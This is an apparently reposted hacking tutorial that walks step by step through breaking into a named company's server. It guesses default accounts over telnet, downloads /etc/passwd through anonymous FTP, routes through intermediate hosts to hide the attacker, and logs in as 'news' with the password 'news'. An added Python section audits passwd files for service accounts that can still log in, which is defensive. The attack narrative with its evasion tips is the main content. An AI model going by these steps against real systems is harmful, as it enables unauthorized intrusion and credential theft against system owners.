Reposted:
>telnet www.fatman.com.tw (first, connect over telnet)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: guest (first try the public account guest)
Password:
Login incorrect (Ah, no luck.. never mind, I'll try again)
fatman login: news
Password:
Connection closed by foreign host.
(Wow, kicked out after only two failed attempts.... this system really is ruthless.. @&!J#~!)
> telnet www.fatman.com.tw (never mind... let's have another go)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: fatman (a hacker's sixth sense...)
Passwd:
Login incorrect
fatman login: system (this is a system default account...)
Passwd:
Login incorrect (looks like it has already been changed..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (switch to ftp and see)
Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有够烂服务有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): fatman (same as before, try the company's name)
331 Password required for fatman.
Password:
530 Login incorrect. (What a failure.. luck doesn't seem to be on my side today)
Login failed.
ftp> user anonymous (let's try the public anonymous account)
331 Guest login ok, send your complete e-mail address as password.
Password: (type anything for the password.. don't be foolish enough to enter a real e-mail address.. qq@ will do)
230 Guest login ok, access restrictions apply.
ftp>pwd
(Finally in.. that was hard work.. first see which directory I'm in)
257 "/" is current directory.
ftp> ls -la
(look for the target, /etc)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)
(Hehe.... found the target..)
ftp> cd etc
(attack it right away)
250 CWD command successful. (Hmm, I can get in...)
ftp> ls -la
(now check whether the password file we want, /etc/passwd, is here)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)
(No way... it's actually that easy)
ftp> get passwd
(Without another word.. grab the password file right away... hehe.)
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)
ftp>bye
221 Goodbye.
(leave right away)
>cat passwd
(take a look at the password file we just got....)
root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
.
.
.
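[rest omitted]
(Bad luck.. it's a shadowed password file.... no wonder it could be downloaded as anonymous.. with
only this, the passwords can't be cracked.... but the accounts in it show which services fatman
provides, such as uucp, mail, ftp, news... operator is used for booting, so it's no use. daemon is
used to assign each account's permissions)
>rm passwd
(better delete it after all...)
>^D
(So tired.. let's stop here for now... at least we now know how to get into the system)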
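Read from the defender's side, the listing above is an account inventory. This added example (not part of the original post) parses passwd entries and flags service accounts that still have a usable login shell, using the listing as sample input. UID_MIN and the two shell sets are assumptions to adjust per host.

```python
# Added example: flag service accounts in a passwd file that can still log in.
# SAMPLE is the listing shown above, with the daemon and operator entries written out in full.
SAMPLE = """\
root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
"""
UID_MIN = 500  # assumption: first UID given to human users on this host
NO_LOGIN = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/dev/null"}
SINGLE_PURPOSE = {"/bin/sync", "/sbin/shutdown", "/sbin/halt"}  # run one command, no shell

def audit_passwd(text, uid_min=UID_MIN):
    """Return (account, reason) pairs for entries worth fixing."""
    findings = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # blank, comment or malformed line
        name, pw, uid, shell = fields[0], fields[1], int(fields[2]), fields[6]
        if pw == "":
            findings.append((name, "empty password field"))
        if uid == 0:
            if name != "root":
                findings.append((name, "extra UID 0 account"))
            continue
        service = uid < uid_min or uid >= 65534  # system range, or a nobody-style UID
        if not service or shell in NO_LOGIN | SINGLE_PURPOSE:
            continue
        reason = "interactive shell " + shell if shell else "empty shell field (falls back to /bin/sh)"
        findings.append((name, reason))
    return findings

if __name__ == "__main__":
    print("\n".join(f"{a:12} {r}" for a, r in audit_passwd(SAMPLE)))
```

Each flagged account should get a non-login shell and a locked password unless it has a documented reason to log in.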
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[Break]
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
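Now, picking up the topic we didn't finish last time..
Last time we got hold of the already-shadowed /etc/passwd!! Don't think it's useless... hehe.. although it can't be used directly
to crack passwords, it did collect some information about the system for us.. so let's bring it out and take another look...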
SunOS 5.6
login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
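(As before, first connect to an intermediate server, which ensures my own IP is not left on the attacked system.. so others
can't trace the connection back either... but the more intermediate servers the better!!)
>who
(as always, check whether it's safe)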
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)
(same as before, nobody is watching)
>telnet www.fatman.com.tw
(the attack begins...)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login:nobody (first try the accounts from the shadowed password file)
Password: (type nobody as the password too...)
Login incorrect
fatman login:news (let's try this one next..)
Password: (news again..)
Linux 2.0.29.
You have mail.
(Woohoo!!!! I'm in.... be sure not to read other people's mail..)
fatman:~$ cd /etc (see whether I can get in)
fatman:/etc$ ls
(take a look...)